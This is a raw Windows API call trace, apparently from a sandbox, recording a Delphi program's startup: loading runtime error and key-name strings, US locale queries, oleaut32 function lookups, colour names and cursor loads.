[0170.523] LoadStringA (in: hInstance=0x27f0000, uID=0xffc2, lpBuffer=0xaf030, cchBufferMax=1024 | out: lpBuffer="Assertion failed") returned 0x10
[0170.523] LoadStringA (in: hInstance=0x27f0000, uID=0xffd4, lpBuffer=0xaf030, cchBufferMax=1024 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29
[0170.523] LoadStringA (in: hInstance=0x27f0000, uID=0xffdd, lpBuffer=0xaf030, cchBufferMax=1024 | out: lpBuffer="Invalid argument") returned 0x10
[0170.523] LoadStringA (in: hInstance=0x27f0000, uID=0xffd3, lpBuffer=0xaf030, cchBufferMax=1024 | out: lpBuffer="Error creating variant or safe array") returned 0x24
[0170.523] LoadStringA (in: hInstance=0x27f0000, uID=0xffd0, lpBuffer=0xaf030, cchBufferMax=1024 | out: lpBuffer="Variant method calls not supported") returned 0x22
[0170.523] LoadStringA (in: hInstance=0x27f0000, uID=0xffd7, lpBuffer=0xaf030, cchBufferMax=1024 | out: lpBuffer="Invalid variant operation") returned 0x19
[0170.523] LoadStringA (in: hInstance=0x27f0000, uID=0xffd6, lpBuffer=0xaf030, cchBufferMax=1024 | out: lpBuffer="Invalid variant type conversion") returned 0x1f
[0170.523] LoadStringA (in: hInstance=0x27f0000, uID=0xffe8, lpBuffer=0xaf030, cchBufferMax=1024 | out: lpBuffer="Stack overflow") returned 0xe
[0170.523] LoadStringA (in: hInstance=0x27f0000, uID=0xffe9, lpBuffer=0xaf030, cchBufferMax=1024 | out: lpBuffer="Control-C hit") returned 0xd
[0170.523] LoadStringA (in: hInstance=0x27f0000, uID=0xffea, lpBuffer=0xaf030, cchBufferMax=1024 | out: lpBuffer="Privileged instruction") returned 0x16
[0170.523] LoadStringA (in: hInstance=0x27f0000, uID=0xffe7, lpBuffer=0xaf030, cchBufferMax=1024 | out: lpBuffer="Access violation") returned 0x10
[0170.523] LoadStringA (in: hInstance=0x27f0000, uID=0xffe5, lpBuffer=0xaf030, cchBufferMax=1024 | out: lpBuffer="Invalid class typecast") returned 0x16
[0170.523] LoadStringA (in: hInstance=0x27f0000, uID=0xffe3, lpBuffer=0xaf030, cchBufferMax=1024 | out: lpBuffer="Floating point underflow") returned 0x18
[0170.523] LoadStringA (in: hInstance=0x27f0000, uID=0xffe2, lpBuffer=0xaf030, cchBufferMax=1024 | out: lpBuffer="Floating point overflow") returned 0x17
[0170.523] LoadStringA (in: hInstance=0x27f0000, uID=0xffe1, lpBuffer=0xaf030, cchBufferMax=1024 | out: lpBuffer="Floating point division by zero") returned 0x1f
[0170.523] LoadStringA (in: hInstance=0x27f0000, uID=0xffe0, lpBuffer=0xaf030, cchBufferMax=1024 | out: lpBuffer="Invalid floating point operation") returned 0x20
[0170.523] LoadStringA (in: hInstance=0x27f0000, uID=0xffff, lpBuffer=0xaf030, cchBufferMax=1024 | out: lpBuffer="Integer overflow") returned 0x10
[0170.523] LoadStringA (in: hInstance=0x27f0000, uID=0xfffe, lpBuffer=0xaf030, cchBufferMax=1024 | out: lpBuffer="Range check error") returned 0x11
[0170.523] LoadStringA (in: hInstance=0x27f0000, uID=0xfffd, lpBuffer=0xaf030, cchBufferMax=1024 | out: lpBuffer="Division by zero") returned 0x10
[0170.523] LoadStringA (in: hInstance=0x27f0000, uID=0xfffc, lpBuffer=0xaf030, cchBufferMax=1024 | out: lpBuffer="Invalid numeric input") returned 0x15
[0170.523] LoadStringA (in: hInstance=0x27f0000, uID=0xfffb, lpBuffer=0xaf030, cchBufferMax=1024 | out: lpBuffer="Disk full") returned 0x9
[0170.523] LoadStringA (in: hInstance=0x27f0000, uID=0xfffa, lpBuffer=0xaf030, cchBufferMax=1024 | out: lpBuffer="Read beyond end of file") returned 0x17
[0170.523] LoadStringA (in: hInstance=0x27f0000, uID=0xfff9, lpBuffer=0xaf030, cchBufferMax=1024 | out: lpBuffer="File access denied") returned 0x12
[0170.523] LoadStringA (in: hInstance=0x27f0000, uID=0xfff8, lpBuffer=0xaf030, cchBufferMax=1024 | out: lpBuffer="Too many open files") returned 0x13
[0170.523] LoadStringA (in: hInstance=0x27f0000, uID=0xfff7, lpBuffer=0xaf030, cchBufferMax=1024 | out: lpBuffer="Invalid filename") returned 0x10
[0170.524] LoadStringA (in: hInstance=0x27f0000, uID=0xfff6, lpBuffer=0xaf030, cchBufferMax=1024 | out: lpBuffer="File not found") returned 0xe
[0170.524] LoadStringA (in: hInstance=0x27f0000, uID=0xfff4, lpBuffer=0xaf01c, cchBufferMax=1024 | out: lpBuffer="Out of memory") returned 0xd
[0170.524] LoadStringA (in: hInstance=0x27f0000, uID=0xffe4, lpBuffer=0xaf01c, cchBufferMax=1024 | out: lpBuffer="Invalid pointer operation") returned 0x19
[0170.524] GetVersionExA (in: lpVersionInformation=0xaf3b4*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x27f0000, dwMinorVersion=0x0, dwBuildNumber=0x28, dwPlatformId=0x65636341, szCSDVersion="ssibleObjectFromr<\x7f\x02·\"\x7f\x02Lô\n") | out: lpVersionInformation=0xaf3b4*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0170.524] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0170.524] GetProcAddress (hModule=0x75370000, lpProcName="GetDiskFreeSpaceExA") returned 0x753ff46f
[0170.524] GetThreadLocale () returned 0x409
[0170.524] GetThreadLocale () returned 0x409
[0170.524] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0xaf28c, cchData=256 | out: lpLCData="Jan") returned 4
[0170.524] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0xaf28c, cchData=256 | out: lpLCData="January") returned 8
[0170.524] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0xaf28c, cchData=256 | out: lpLCData="Feb") returned 4
[0170.524] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0xaf28c, cchData=256 | out: lpLCData="February") returned 9
[0170.524] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0xaf28c, cchData=256 | out: lpLCData="Mar") returned 4
[0170.524] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0xaf28c, cchData=256 | out: lpLCData="March") returned 6
[0170.524] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0xaf28c, cchData=256 | out: lpLCData="Apr") returned 4
[0170.524] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0xaf28c, cchData=256 | out: lpLCData="April") returned 6
[0170.524] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0xaf28c, cchData=256 | out: lpLCData="May") returned 4
[0170.524] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0xaf28c, cchData=256 | out: lpLCData="May") returned 4
[0170.524] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0xaf28c, cchData=256 | out: lpLCData="Jun") returned 4
[0170.524] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0xaf28c, cchData=256 | out: lpLCData="June") returned 5
[0170.524] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0xaf28c, cchData=256 | out: lpLCData="Jul") returned 4
[0170.524] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0xaf28c, cchData=256 | out: lpLCData="July") returned 5
[0170.524] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0xaf28c, cchData=256 | out: lpLCData="Aug") returned 4
[0170.524] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0xaf28c, cchData=256 | out: lpLCData="August") returned 7
[0170.524] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0xaf28c, cchData=256 | out: lpLCData="Sep") returned 4
[0170.524] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0xaf28c, cchData=256 | out: lpLCData="September") returned 10
[0170.524] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0xaf28c, cchData=256 | out: lpLCData="Oct") returned 4
[0170.524] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0xaf28c, cchData=256 | out: lpLCData="October") returned 8
[0170.524] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0xaf28c, cchData=256 | out: lpLCData="Nov") returned 4
[0170.524] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0xaf28c, cchData=256 | out: lpLCData="November") returned 9
[0170.524] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0xaf28c, cchData=256 | out: lpLCData="Dec") returned 4
[0170.524] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0xaf28c, cchData=256 | out: lpLCData="December") returned 9
[0170.524] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0xaf28c, cchData=256 | out: lpLCData="Sun") returned 4
[0170.524] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0xaf28c, cchData=256 | out: lpLCData="Sunday") returned 7
[0170.524] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0xaf28c, cchData=256 | out: lpLCData="Mon") returned 4
[0170.524] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0xaf28c, cchData=256 | out: lpLCData="Monday") returned 7
[0170.524] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0xaf28c, cchData=256 | out: lpLCData="Tue") returned 4
[0170.525] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0xaf28c, cchData=256 | out: lpLCData="Tuesday") returned 8
[0170.525] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0xaf28c, cchData=256 | out: lpLCData="Wed") returned 4
[0170.525] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0xaf28c, cchData=256 | out: lpLCData="Wednesday") returned 10
[0170.525] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0xaf28c, cchData=256 | out: lpLCData="Thu") returned 4
[0170.525] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0xaf28c, cchData=256 | out: lpLCData="Thursday") returned 9
[0170.525] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0xaf28c, cchData=256 | out: lpLCData="Fri") returned 4
[0170.525] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0xaf28c, cchData=256 | out: lpLCData="Friday") returned 7
[0170.525] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0xaf28c, cchData=256 | out: lpLCData="Sat") returned 4
[0170.525] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0xaf28c, cchData=256 | out: lpLCData="Saturday") returned 9
[0170.525] GetThreadLocale () returned 0x409
[0170.525] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0xaf2e8, cchData=256 | out: lpLCData="$") returned 2
[0170.525] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0xaf2e8, cchData=256 | out: lpLCData="0") returned 2
[0170.525] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0xaf2e8, cchData=256 | out: lpLCData="0") returned 2
[0170.525] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0xaf3e0, cchData=2 | out: lpLCData=",") returned 2
[0170.525] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0xaf3e0, cchData=2 | out: lpLCData=".") returned 2
[0170.525] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0xaf2e8, cchData=256 | out: lpLCData="2") returned 2
[0170.525] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0xaf3e0, cchData=2 | out: lpLCData="/") returned 2
[0170.525] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0xaf2e8, cchData=256 | out: lpLCData="M/d/yyyy") returned 9
[0170.525] GetThreadLocale () returned 0x409
[0170.525] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0xaf2b4, cchData=256 | out: lpLCData="1") returned 2
[0170.525] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0xaf2e8, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20
[0170.525] GetThreadLocale () returned 0x409
[0170.525] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0xaf2b4, cchData=256 | out: lpLCData="1") returned 2
[0170.525] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0xaf3e0, cchData=2 | out: lpLCData=":") returned 2
[0170.525] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0xaf2e8, cchData=256 | out: lpLCData="AM") returned 3
[0170.525] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0xaf2e8, cchData=256 | out: lpLCData="PM") returned 3
[0170.525] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0xaf2e8, cchData=256 | out: lpLCData="0") returned 2
[0170.525] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0xaf2e8, cchData=256 | out: lpLCData="0") returned 2
[0170.525] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0xaf2e8, cchData=256 | out: lpLCData="0") returned 2
[0170.525] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0xaf3e0, cchData=2 | out: lpLCData=",") returned 2
[0170.525] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x758f0000
[0170.525] GetProcAddress (hModule=0x758f0000, lpProcName="VariantChangeTypeEx") returned 0x758f4c28
[0170.525] GetProcAddress (hModule=0x758f0000, lpProcName="VarNeg") returned 0x7596c802
[0170.525] GetProcAddress (hModule=0x758f0000, lpProcName="VarNot") returned 0x7596ec66
[0170.526] GetProcAddress (hModule=0x758f0000, lpProcName="VarAdd") returned 0x75915934
[0170.526] GetProcAddress (hModule=0x758f0000, lpProcName="VarSub") returned 0x7596d332
[0170.526] GetProcAddress (hModule=0x758f0000, lpProcName="VarMul") returned 0x7596dbd4
[0170.526] GetProcAddress (hModule=0x758f0000, lpProcName="VarDiv") returned 0x7596e405
[0170.526] GetProcAddress (hModule=0x758f0000, lpProcName="VarIdiv") returned 0x7596f00a
[0170.526] GetProcAddress (hModule=0x758f0000, lpProcName="VarMod") returned 0x7596f15e
[0170.526] GetProcAddress (hModule=0x758f0000, lpProcName="VarAnd") returned 0x75915a98
[0170.526] GetProcAddress (hModule=0x758f0000, lpProcName="VarOr") returned 0x7596ecfa
[0170.526] GetProcAddress (hModule=0x758f0000, lpProcName="VarXor") returned 0x7596ee2e
[0170.526] GetProcAddress (hModule=0x758f0000, lpProcName="VarCmp") returned 0x7590b0dc
[0170.526] GetProcAddress (hModule=0x758f0000, lpProcName="VarI4FromStr") returned 0x75906fab
[0170.526] GetProcAddress (hModule=0x758f0000, lpProcName="VarR4FromStr") returned 0x759101a0
[0170.526] GetProcAddress (hModule=0x758f0000, lpProcName="VarR8FromStr") returned 0x7590699e
[0170.526] GetProcAddress (hModule=0x758f0000, lpProcName="VarDateFromStr") returned 0x75916ba7
[0170.527] GetProcAddress (hModule=0x758f0000, lpProcName="VarCyFromStr") returned 0x75936c12
[0170.527] GetProcAddress (hModule=0x758f0000, lpProcName="VarBoolFromStr") returned 0x7590dbd1
[0170.527] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromCy") returned 0x75917fdc
[0170.527] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromDate") returned 0x75907a2a
[0170.527] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromBool") returned 0x75910355
[0170.527] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="") returned 0xa8
[0170.527] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0xa0
[0170.527] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xac
[0170.527] GetModuleHandleA (lpModuleName="USER32.DLL") returned 0x757b0000
[0170.527] GetDC (hWnd=0x0) returned 0x6f01071a
[0170.527] GetDeviceCaps (hdc=0x6f01071a, index=90) returned 96
[0170.527] ReleaseDC (hWnd=0x0, hDC=0x6f01071a) returned 1
[0170.527] GetDC (hWnd=0x0) returned 0x6f01071a
[0170.527] GetDeviceCaps (hdc=0x6f01071a, index=104) returned 0
[0170.527] ReleaseDC (hWnd=0x0, hDC=0x6f01071a) returned 1
[0170.528] CreatePalette (plpal=0xaf044) returned 0x5c080872
[0170.528] GetStockObject (i=7) returned 0x1b00017
[0170.528] GetStockObject (i=5) returned 0x1900015
[0170.528] GetStockObject (i=13) returned 0x18a002e
[0170.528] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0170.528] MulDiv (nNumber=8, nNumerator=96, nDenominator=72) returned 11
[0170.528] LoadStringA (in: hInstance=0x27f0000, uID=0xff3d, lpBuffer=0xaf040, cchBufferMax=1024 | out: lpBuffer="Alt+") returned 0x4
[0170.528] LoadStringA (in: hInstance=0x27f0000, uID=0xff3c, lpBuffer=0xaf040, cchBufferMax=1024 | out: lpBuffer="Ctrl+") returned 0x5
[0170.528] LoadStringA (in: hInstance=0x27f0000, uID=0xff3b, lpBuffer=0xaf040, cchBufferMax=1024 | out: lpBuffer="Shift+") returned 0x6
[0170.528] LoadStringA (in: hInstance=0x27f0000, uID=0xff3a, lpBuffer=0xaf040, cchBufferMax=1024 | out: lpBuffer="Del") returned 0x3
[0170.528] LoadStringA (in: hInstance=0x27f0000, uID=0xff39, lpBuffer=0xaf040, cchBufferMax=1024 | out: lpBuffer="Ins") returned 0x3
[0170.528] LoadStringA (in: hInstance=0x27f0000, uID=0xff38, lpBuffer=0xaf040, cchBufferMax=1024 | out: lpBuffer="Down") returned 0x4
[0170.528] LoadStringA (in: hInstance=0x27f0000, uID=0xff37, lpBuffer=0xaf040, cchBufferMax=1024 | out: lpBuffer="Right") returned 0x5
[0170.528] LoadStringA (in: hInstance=0x27f0000, uID=0xff36, lpBuffer=0xaf040, cchBufferMax=1024 | out: lpBuffer="Up") returned 0x2
[0170.528] LoadStringA (in: hInstance=0x27f0000, uID=0xff35, lpBuffer=0xaf040, cchBufferMax=1024 | out: lpBuffer="Left") returned 0x4
[0170.528] LoadStringA (in: hInstance=0x27f0000, uID=0xff34, lpBuffer=0xaf040, cchBufferMax=1024 | out: lpBuffer="Home") returned 0x4
[0170.528] LoadStringA (in: hInstance=0x27f0000, uID=0xff33, lpBuffer=0xaf040, cchBufferMax=1024 | out: lpBuffer="End") returned 0x3
[0170.528] LoadStringA (in: hInstance=0x27f0000, uID=0xff32, lpBuffer=0xaf040, cchBufferMax=1024 | out: lpBuffer="PgDn") returned 0x4
[0170.528] LoadStringA (in: hInstance=0x27f0000, uID=0xff31, lpBuffer=0xaf040, cchBufferMax=1024 | out: lpBuffer="PgUp") returned 0x4
[0170.528] LoadStringA (in: hInstance=0x27f0000, uID=0xff30, lpBuffer=0xaf040, cchBufferMax=1024 | out: lpBuffer="Space") returned 0x5
[0170.528] LoadStringA (in: hInstance=0x27f0000, uID=0xff4f, lpBuffer=0xaf040, cchBufferMax=1024 | out: lpBuffer="Enter") returned 0x5
[0170.528] LoadStringA (in: hInstance=0x27f0000, uID=0xff4e, lpBuffer=0xaf040, cchBufferMax=1024 | out: lpBuffer="Esc") returned 0x3
[0170.528] LoadStringA (in: hInstance=0x27f0000, uID=0xff4d, lpBuffer=0xaf040, cchBufferMax=1024 | out: lpBuffer="Tab") returned 0x3
[0170.528] LoadStringA (in: hInstance=0x27f0000, uID=0xff4c, lpBuffer=0xaf040, cchBufferMax=1024 | out: lpBuffer="BkSp") returned 0x4
[0170.529] RegisterClipboardFormatA (lpszFormat="commdlg_help") returned 0xc0eb
[0170.529] RegisterClipboardFormatA (lpszFormat="commdlg_FindReplace") returned 0xc0fc
[0170.529] GetCurrentThreadId () returned 0x518
[0170.529] GlobalAddAtomA (lpString="WndProcPtr027F000000000518") returned 0xc107
[0170.529] LoadStringA (in: hInstance=0x27f0000, uID=0xfefc, lpBuffer=0xaf040, cchBufferMax=1024 | out: lpBuffer="Window Text") returned 0xb
[0170.529] LoadStringA (in: hInstance=0x27f0000, uID=0xfefb, lpBuffer=0xaf040, cchBufferMax=1024 | out: lpBuffer="Window Frame") returned 0xc
[0170.529] LoadStringA (in: hInstance=0x27f0000, uID=0xfefa, lpBuffer=0xaf040, cchBufferMax=1024 | out: lpBuffer="Window Background") returned 0x11
[0170.529] LoadStringA (in: hInstance=0x27f0000, uID=0xfef9, lpBuffer=0xaf040, cchBufferMax=1024 | out: lpBuffer="3D Light") returned 0x8
[0170.529] LoadStringA (in: hInstance=0x27f0000, uID=0xfef8, lpBuffer=0xaf040, cchBufferMax=1024 | out: lpBuffer="3D Dark Shadow") returned 0xe
[0170.529] LoadStringA (in: hInstance=0x27f0000, uID=0xfef7, lpBuffer=0xaf040, cchBufferMax=1024 | out: lpBuffer="Scroll Bar") returned 0xa
[0170.529] LoadStringA (in: hInstance=0x27f0000, uID=0xfef6, lpBuffer=0xaf040, cchBufferMax=1024 | out: lpBuffer="None") returned 0x4
[0170.529] LoadStringA (in: hInstance=0x27f0000, uID=0xfef5, lpBuffer=0xaf040, cchBufferMax=1024 | out: lpBuffer="Menu Text") returned 0x9
[0170.529] LoadStringA (in: hInstance=0x27f0000, uID=0xfef4, lpBuffer=0xaf040, cchBufferMax=1024 | out: lpBuffer="Menu Background") returned 0xf
[0170.529] LoadStringA (in: hInstance=0x27f0000, uID=0xfef3, lpBuffer=0xaf040, cchBufferMax=1024 | out: lpBuffer="Info Text") returned 0x9
[0170.529] LoadStringA (in: hInstance=0x27f0000, uID=0xfef2, lpBuffer=0xaf040, cchBufferMax=1024 | out: lpBuffer="Info Background") returned 0xf
[0170.529] LoadStringA (in: hInstance=0x27f0000, uID=0xfef1, lpBuffer=0xaf040, cchBufferMax=1024 | out: lpBuffer="Inactive Caption Text") returned 0x15
[0170.529] LoadStringA (in: hInstance=0x27f0000, uID=0xfef0, lpBuffer=0xaf040, cchBufferMax=1024 | out: lpBuffer="Inactive Caption") returned 0x10
[0170.529] LoadStringA (in: hInstance=0x27f0000, uID=0xff0f, lpBuffer=0xaf040, cchBufferMax=1024 | out: lpBuffer="Inactive Border") returned 0xf
[0170.529] LoadStringA (in: hInstance=0x27f0000, uID=0xff0e, lpBuffer=0xaf040, cchBufferMax=1024 | out: lpBuffer="Highlight Text") returned 0xe
[0170.529] LoadStringA (in: hInstance=0x27f0000, uID=0xff0d, lpBuffer=0xaf040, cchBufferMax=1024 | out: lpBuffer="Highlight Background") returned 0x14
[0170.529] LoadStringA (in: hInstance=0x27f0000, uID=0xff0c, lpBuffer=0xaf040, cchBufferMax=1024 | out: lpBuffer="Gray Text") returned 0x9
[0170.529] LoadStringA (in: hInstance=0x27f0000, uID=0xff0b, lpBuffer=0xaf040, cchBufferMax=1024 | out: lpBuffer="Default") returned 0x7
[0170.529] LoadStringA (in: hInstance=0x27f0000, uID=0xff0a, lpBuffer=0xaf040, cchBufferMax=1024 | out: lpBuffer="Caption Text") returned 0xc
[0170.529] LoadStringA (in: hInstance=0x27f0000, uID=0xff09, lpBuffer=0xaf040, cchBufferMax=1024 | out: lpBuffer="Button Text") returned 0xb
[0170.529] LoadStringA (in: hInstance=0x27f0000, uID=0xff08, lpBuffer=0xaf040, cchBufferMax=1024 | out: lpBuffer="Button Shadow") returned 0xd
[0170.529] LoadStringA (in: hInstance=0x27f0000, uID=0xff07, lpBuffer=0xaf040, cchBufferMax=1024 | out: lpBuffer="Button Highlight") returned 0x10
[0170.529] LoadStringA (in: hInstance=0x27f0000, uID=0xff06, lpBuffer=0xaf040, cchBufferMax=1024 | out: lpBuffer="Button Face") returned 0xb
[0170.529] LoadStringA (in: hInstance=0x27f0000, uID=0xff05, lpBuffer=0xaf040, cchBufferMax=1024 | out: lpBuffer="Background") returned 0xa
[0170.529] LoadStringA (in: hInstance=0x27f0000, uID=0xff04, lpBuffer=0xaf040, cchBufferMax=1024 | out: lpBuffer="Application Workspace") returned 0x15
[0170.529] LoadStringA (in: hInstance=0x27f0000, uID=0xff03, lpBuffer=0xaf040, cchBufferMax=1024 | out: lpBuffer="Active Caption") returned 0xe
[0170.529] LoadStringA (in: hInstance=0x27f0000, uID=0xff02, lpBuffer=0xaf040, cchBufferMax=1024 | out: lpBuffer="Active Border") returned 0xd
[0170.529] LoadStringA (in: hInstance=0x27f0000, uID=0xff01, lpBuffer=0xaf040, cchBufferMax=1024 | out: lpBuffer="Medium Gray") returned 0xb
[0170.529] LoadStringA (in: hInstance=0x27f0000, uID=0xff00, lpBuffer=0xaf040, cchBufferMax=1024 | out: lpBuffer="Cream") returned 0x5
[0170.530] LoadStringA (in: hInstance=0x27f0000, uID=0xff1f, lpBuffer=0xaf040, cchBufferMax=1024 | out: lpBuffer="Sky Blue") returned 0x8
[0170.530] LoadStringA (in: hInstance=0x27f0000, uID=0xff1e, lpBuffer=0xaf040, cchBufferMax=1024 | out: lpBuffer="Money Green") returned 0xb
[0170.530] LoadStringA (in: hInstance=0x27f0000, uID=0xff1d, lpBuffer=0xaf040, cchBufferMax=1024 | out: lpBuffer="White") returned 0x5
[0170.530] LoadStringA (in: hInstance=0x27f0000, uID=0xff1c, lpBuffer=0xaf040, cchBufferMax=1024 | out: lpBuffer="Aqua") returned 0x4
[0170.530] LoadStringA (in: hInstance=0x27f0000, uID=0xff1b, lpBuffer=0xaf040, cchBufferMax=1024 | out: lpBuffer="Fuchsia") returned 0x7
[0170.530] LoadStringA (in: hInstance=0x27f0000, uID=0xff1a, lpBuffer=0xaf040, cchBufferMax=1024 | out: lpBuffer="Blue") returned 0x4
[0170.530] LoadStringA (in: hInstance=0x27f0000, uID=0xff19, lpBuffer=0xaf040, cchBufferMax=1024 | out: lpBuffer="Yellow") returned 0x6
[0170.530] LoadStringA (in: hInstance=0x27f0000, uID=0xff18, lpBuffer=0xaf040, cchBufferMax=1024 | out: lpBuffer="Lime") returned 0x4
[0170.530] LoadStringA (in: hInstance=0x27f0000, uID=0xff17, lpBuffer=0xaf040, cchBufferMax=1024 | out: lpBuffer="Red") returned 0x3
[0170.530] LoadStringA (in: hInstance=0x27f0000, uID=0xff16, lpBuffer=0xaf040, cchBufferMax=1024 | out: lpBuffer="Silver") returned 0x6
[0170.530] LoadStringA (in: hInstance=0x27f0000, uID=0xff15, lpBuffer=0xaf040, cchBufferMax=1024 | out: lpBuffer="Gray") returned 0x4
[0170.530] LoadStringA (in: hInstance=0x27f0000, uID=0xff14, lpBuffer=0xaf040, cchBufferMax=1024 | out: lpBuffer="Teal") returned 0x4
[0170.530] LoadStringA (in: hInstance=0x27f0000, uID=0xff13, lpBuffer=0xaf040, cchBufferMax=1024 | out: lpBuffer="Purple") returned 0x6
[0170.530] LoadStringA (in: hInstance=0x27f0000, uID=0xff12, lpBuffer=0xaf040, cchBufferMax=1024 | out: lpBuffer="Navy") returned 0x4
[0170.530] LoadStringA (in: hInstance=0x27f0000, uID=0xff11, lpBuffer=0xaf040, cchBufferMax=1024 | out: lpBuffer="Olive") returned 0x5
[0170.530] LoadStringA (in: hInstance=0x27f0000, uID=0xff10, lpBuffer=0xaf040, cchBufferMax=1024 | out: lpBuffer="Green") returned 0x5
[0170.530] LoadStringA (in: hInstance=0x27f0000, uID=0xff2f, lpBuffer=0xaf040, cchBufferMax=1024 | out: lpBuffer="Maroon") returned 0x6
[0170.530] LoadStringA (in: hInstance=0x27f0000, uID=0xff2e, lpBuffer=0xaf040, cchBufferMax=1024 | out: lpBuffer="Black") returned 0x5
[0170.530] RegisterClipboardFormatA (lpszFormat="Delphi Picture") returned 0xc157
[0170.530] RegisterClipboardFormatA (lpszFormat="Delphi Component") returned 0xc158
[0170.530] GetVersion () returned 0x1db10106
[0170.530] GetCurrentProcessId () returned 0x850
[0170.530] GlobalAddAtomA (lpString="Delphi00000850") returned 0xc10c
[0170.530] GetCurrentThreadId () returned 0x518
[0170.530] GlobalAddAtomA (lpString="ControlOfs027F000000000518") returned 0xc106
[0170.530] RegisterClipboardFormatA (lpszFormat="ControlOfs027F000000000518") returned 0xc181
[0170.530] GetProcAddress (hModule=0x757b0000, lpProcName="GetMonitorInfoA") returned 0x757bc34e
[0170.530] GetProcAddress (hModule=0x757b0000, lpProcName="GetSystemMetrics") returned 0x757c67cf
[0170.530] GetSystemMetrics (nIndex=19) returned 1
[0170.530] GetSystemMetrics (nIndex=75) returned 1
[0170.530] SystemParametersInfoA (in: uiAction=0x68, uiParam=0x0, pvParam=0x2911320, fWinIni=0x0 | out: pvParam=0x2911320) returned 1
[0170.531] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0170.531] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0170.531] LoadCursorA (hInstance=0x27f0000, lpCursorName=0x7ff9) returned 0x40111
[0170.531] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8b) returned 0x1001b
[0170.531] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8a) returned 0x10019
[0170.531] LoadCursorA (hInstance=0x0, lpCursorName=0x7f88) returned 0x10017
[0170.531] LoadCursorA (hInstance=0x27f0000, lpCursorName=0x7ffa) returned 0xf022d
[0170.531] LoadCursorA (hInstance=0x27f0000, lpCursorName=0x7ffb) returned 0xc0229
